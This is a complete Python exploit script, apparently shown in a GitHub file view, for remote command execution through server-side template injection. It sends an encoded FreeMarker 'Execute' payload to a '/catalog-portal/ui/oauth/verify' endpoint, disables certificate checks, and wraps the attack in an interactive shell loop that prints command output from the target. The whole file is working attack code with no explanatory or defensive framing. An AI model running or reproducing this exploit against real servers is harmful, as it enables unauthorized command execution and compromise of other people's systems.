/
exploit.py
73 lines (66 loc) · 2.54 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
import requests
import sys
import urllib3
def encode_all(string):
return "".join("%{0:0>2}".format(format(ord(char), "x")) for char in string)
def main(command):
userSite = sys.argv[1]
parseMode = True
if "--raw" in command:
parseMode = False
# If the user includes a / at the end of the command, remove it
if userSite.endswith("/"):
userSite = userSite[:-1]
url = userSite + "/catalog-portal/ui/oauth/verify?error=&deviceUdid="
# This is the payload that will be sent to the server
# command = input("Enter the command to execute: ")
unencoded_payload = '''${"freemarker.template.utility.Execute"?new()("''' + \
command + '''")}'''
# URL encode every character in command
payload = encode_all(unencoded_payload)
# print("[+] Sending payload: " + payload)
# This is the headers that will be used to send the payload
headers = {
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Connection": "close",
"Upgrade-Insecure-Requests": "1",
"Content-Type": "application/x-www-form-urlencoded",
"Content-Length": "0",
}
# This is the request that will be sent to the server
# Allow insecure requests to bypass the certificate check
# Ignore the insecure warning
urllib3.disable_warnings()
request = requests.get(url + payload, headers=headers, verify=False)
# This is the response that will be received from the server
response = request.text
# This is the output that will be displayed to the user
output = ""
if parseMode:
try:
output = response.split("device id: ")[1].split(", device type")[0]
except:
if response.find("---begin-message---") != -1:
output = response.split(
"---begin-message---")[1].split("---end-message---")[0]
else:
output = response
else:
output = response
# Convert all of the \n to a proper newline
output = output.replace("\\n", "\n")
print(output)
if __name__ == "__main__":
if sys.argv[1] == "--help":
print("Usage: python3 run.py <URL>")
else:
# Loop until the user exits the program
while True:
command = input("$: ")
if command == "exit":
break
else:
main(command)